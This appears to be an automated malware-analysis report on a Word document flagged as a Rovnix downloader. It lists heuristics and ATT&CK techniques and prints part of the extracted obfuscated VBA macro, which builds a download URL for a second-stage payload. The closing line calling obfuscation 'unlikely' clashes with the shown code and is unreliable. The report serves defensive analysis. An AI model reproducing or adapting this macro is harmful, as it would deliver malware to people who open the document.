MALICIOUS (Risk Score: 262)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is an OOXML document containing VBA macros, specifically an Auto_Close macro that utilizes CreateObject. ClamAV identifies this as Doc.Downloader.Rovnix-6497736-0. The VBA code appears to be obfuscated but the presence of Auto_Close and CreateObject strongly suggests it's designed to download and execute a secondary payload.
Heuristics (6)

- ClamAV: Doc.Downloader.Rovnix-6497736-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
- VBA project inside OOXML [medium, OOXML_VBA, 3 related findings]: Document contains a VBA project (VBA macros present)
- Auto_Close macro [high, OLE_VBA_AUTOCLOSE]: Auto_Close macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16292 bytes |

SHA-256: 7fa1ef1c9f7fa9ecde6380b7af91bfbe4e6349a5ca10a599857789a1b7eea7eb
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub oXoEzNTogQRdOp()
NOBMRvP = Acos(3899) - Acos(2392) - 385 - 3748 - 1851
vTQrxYvB = 1690 - 2091 - 1161 - 2414 - Acos(4235) - 2031 - 2100
LErPCgRI = Left("nXvuzZHZkG", 3) + "kbnPJPiuGjYrpIS" + Left("jrSRoAxTPU", 2)
wwWRSAip = Left("vOXjVwSPHK", 10) + "zXKqFnZPx"
pZiBiAIr = Left("yIpUKINEXy", 1) + Left("dwITnxqXVx", 6) + "Uo" + "RT" + Left("oPNWwoqPMu", 6) + "vEApRJpPMD"
Application.Run "rUvJZcviixLrBo"
PXifBjqD = 413 + 3223 + Acos(1972)
ckGAbUzfv = "VnwSPZwPvVIB" + "pZcuWFWLUKukYw" + Left("DdBYwQWoSY", 3) + Left("HgAJgDxiDd", 10) + "BbrEFIgiCpLqX"
goWRFgjgccr = Left("PLQIAfIAfb", 2) + Left("BXFgTjPLnv", 3) + "iKcAnrZgJ"
End Sub
Sub pUquKRiHgoAwqC()
oUkkAVAYx = Left("fopxgLPHwK", 9) + "zYyzNG" + Left("JoXoEzNTog", 8) + "prUvJZcviixL"
oPibRCdnSZg = Left("upZNOxXunG", 1) + "qExgfTdIBrI" + Left("VpUquKRiHg", 3) + Left("qCJLxzNkkw", 2) + Left("kUEinydprK", 2) + "SuB"
CNiXrGyZW = Left("EkRGgcWvZd", 1) + "cG"
Application.Run "KDfYWPWWguxxzXx"
QFzvXTjC = 4898 - Acos(3255) - 4960 - Acos(516)
bDbqgxMf = 4251 - Acos(2881)
JQqPQqKA = Acos(1629) + 915 + 25 + 2833
End Sub
Function Acos(X)
Acos = Atn(X) - Atn(1)
End Function
Public Function BoUGToyNfzSbMEGV(GkyTTzgODIwwNIgo, ORBqVBMExDZpbW, gnoKyNrNPYJpBOpQoB)
WCfVxTq = Acos(509) - Acos(4300) - Acos(2234) - 1019 - Acos(2041) - 3353 - Acos(264) - Acos(1396)
dKffYJcqbbU = "ukwBqRuCIKVroMMFxyREYMTWwiVYw" + LTrim("HUvcfDHWF") + RTrim("CxcOFSAWqCwXMCJPEIJUQfkpfGIuD")
LWUkkdnKC = Acos(1545) + Acos(3777) + 296 + Acos(1240)
BoUGToyNfzSbMEGV = Replace(GkyTTzgODIwwNIgo, ORBqVBMExDZpbW, gnoKyNrNPYJpBOpQoB)
RgGIgVUQLUj = Left("IcUVEIWoOo", 8) + "DBYPM" + Left("jBgbAyHVcG", 10) + "WJKHNJggdd" + "MJIO" + Left("ucIqVOcCDg", 1)
AnGXxbwFETjd = 4492 + Acos(4901) + Acos(2797) + 3998 + 4039
VFcNzZDcdZ = 2827 + 3529
gHbLELd = Acos(2858) + Acos(2545) + Acos(3611) + Acos(2362) + Acos(2712)
GFYQzScvSQy = 3635 - 4667 - 2232
TjGfNuS = Left("bZCFNUiOYB", 4) + Left("vTUAHUbfRj", 5)
cYJSjLEY = Acos(4265) + 1304 + 4386 + Acos(4171) + 2913 + 980 + Acos(2600)
uoUURCP = 4888 - Acos(4117) - Acos(1591) - 2301
yccURGEwbd = "uYdOWvI" + Left("nIKVUDWopr", 4)
SOPOvvESF = RTrim("MqWC") + LTrim("PjRgTwPSYnuILzR") + "iNPqHD" + RTrim("ULRvYXQ") + "qjrpgrjkKMCA"
bWSqpvCVz = "ybvj" + "rSbR" + "GQVrgwUn" + "GXqKEnRTKg"
cvbkqgdOR = Left("VAUILZVFiU", 7) + "QbwBGPGSMBv" + "GuBHPdYpWQOoCHX"
ocXApMLinCRO = Acos(895) + Acos(4376) + Acos(2661)
kzQHcDbKR = 4006 - Acos(2607) - Acos(4016) - 4117
DpKdwSBJyJO = 2634 + 1376 + 3929 + Acos(4294) + Acos(4236) + Acos(744) + Acos(1464)
NqIWbPdZAE = "QRSj" + "FNrRDCPAPxpBFqJ" + "ACcUInKQJKLfBBR"
End Function
Sub KDfYWPWWguxxzXx()
DAFYCdUUNN = Acos(4591) + Acos(4434) + Acos(4296) + Acos(3207) + 3236 + 1167
uVNJrHfvnTy = "dDVfyv" + "fvDz" + "PLLKvDzOL"
JBxjEFgkMvq = 332 + 1140 + Acos(2536) + 3443 + 1485 + 4201
HwOIYcENHxfd = RTrim("uIHqIbxGzMBcnPcCVRTqbWj") + LTrim("MSozFYgwgyzIodPWoA") + RTrim("CdQODSFfXDGcVvNE") + "dnOpHouQGi" + RTrim("jMwCyqFHuSgXgrXk")
jUpHiXYozSv = "wUHYBcyOnqQVVbTIyqpJcBZkL" + RTrim("kEiQgZEBTnrDAPkpuPxF") + "NoZiKNVJLyIvIkOXSFx" + LTrim("uYBc") + "PCQTxYbNAofDf"
HcyKSBAnUDWHXcTCOz = "rMBNSQVUQrkyNpDLxgxocPdyhUENDIFWkICZjRbAynoqfJGWY hUENDIFWkICZjUENDIFWkICZjp://qdkngijbqnwrvjFXrdNgSJohiqwrbzudwrvjFXrdNgSJo.corMBNSQVUQrky/REX/NpDLxgxocPdyWBfzpvQqxMQyick.php?uUENDIFWkICZjrMBNSQVUQrkyRbAynoqfJGWY=borMBNSQVUQrkybWBfzpvQqxMQy"
HcyKSBAnUDWHXcTCOz = BoUGToyNfzSbMEGV(HcyKSBAnUDWHXcTCOz, "rMBNSQVUQrky", "m")
LxyiUXTBbURP = Acos(3753) - 620 - Acos(3284) - 519
LwLHbQCQJPE = 3908 + 2302 + Acos(3136)
LwySwUyxb = "BoYvxwIdMzDxEHEpAJbjFP" + "LozqJioDuUWwVu" + RTrim("AGxfKLkHLMPkArWjzDSxHWp")
vQjbUALJE = 91 + 4636 + Acos(1101) + 3352 + 3407 + Acos(4214)
HcyKSBAnUDWHXcTCOz = BoUGToyNfzSbMEGV(HcyKSBAnUDWHXcTCOz, "RbAynoqfJGWY", "
```

... (truncated)
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 43520 bytes |

SHA-256: ef5eafbc1a838212055d2f795bba3ac67b3e5fba6c079372db3c902ef6c33611

Detection:
- ClamAV: Doc.Downloader.Rovnix-6497736-0
- Obfuscation or payload: unlikely